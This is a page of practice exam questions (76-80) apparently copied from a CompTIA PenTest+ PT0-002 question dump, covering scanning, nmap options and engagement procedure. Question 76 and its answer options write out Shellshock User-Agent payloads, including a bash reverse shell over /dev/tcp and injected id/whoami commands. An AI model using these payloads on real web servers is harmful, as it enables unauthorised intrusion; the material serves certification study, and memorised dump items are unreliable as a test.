Free Access CompTIA.PT0-002.v2022-07-29.q85 Practice Test (Page 17)

Question 76

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

B.exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

C.exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

D.exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

Question 77

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

A.may cause unintended failures in control systems.

B.will create a denial-of-service condition on the IP networks.

C.may reduce the true positive rate of findings.

D.will reveal vulnerabilities in the Modbus protocol.

Question 78

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

A.Run nmap with the -sV and -p22 options set against the target

B.Run nmap with the -o, -p22, and -sC options set against the target

C.Run nmap with the -sA option set against the target

D.Run nmap with the --script vulners option set against the target

Question 79

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A.Collect the proper evidence and add to the final report

B.Reach out to the primary point of contact

C.Call law enforcement officials immediately

D.Try to take down the attackers

Question 80

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?

A.Review of the lessons learned during the engagement

B.Attestation of findings and delivery of the report

C.Scheduling of follow-up actions and retesting

D.Acceptance by the client and sign-off on the final report

Other Version: 715CompTIA.PT0-002.v2025-07-15.q245; 1398CompTIA.PT0-002.v2024-06-12.q330; 1160CompTIA.PT0-002.v2023-02-20.q55; 1278CompTIA.PT0-002.v2022-04-29.q49; 1526CompTIA.PT0-002.v2022-04-23.q65; 95CompTIA.Trainingdump.PT0-002.v2021-12-19.by.barlow.38q.pdf

Latest Upload: 105OCEG.GRCP.v2025-09-11.q211; 104HP.HPE0-V27.v2025-09-11.q78; 118Oracle.1Z0-1057-23.v2025-09-10.q47; 150Google.Professional-Cloud-Network-Engineer.v2025-09-09.q179; 131SAP.C-S4EWM-2023.v2025-09-08.q83; 164TheSecOpsGroup.CNSP.v2025-09-08.q20; 223CFAInstitute.ESG-Investing.v2025-09-08.q173; 158PECB.ISO-IEC-27001-Lead-Implementer.v2025-09-06.q132; 148Salesforce.Data-Architect.v2025-09-05.q216; 144Adobe.AD0-E605.v2025-09-05.q50

Question 76

Question 77

Question 78

Question 79

Question 80

Download PDF File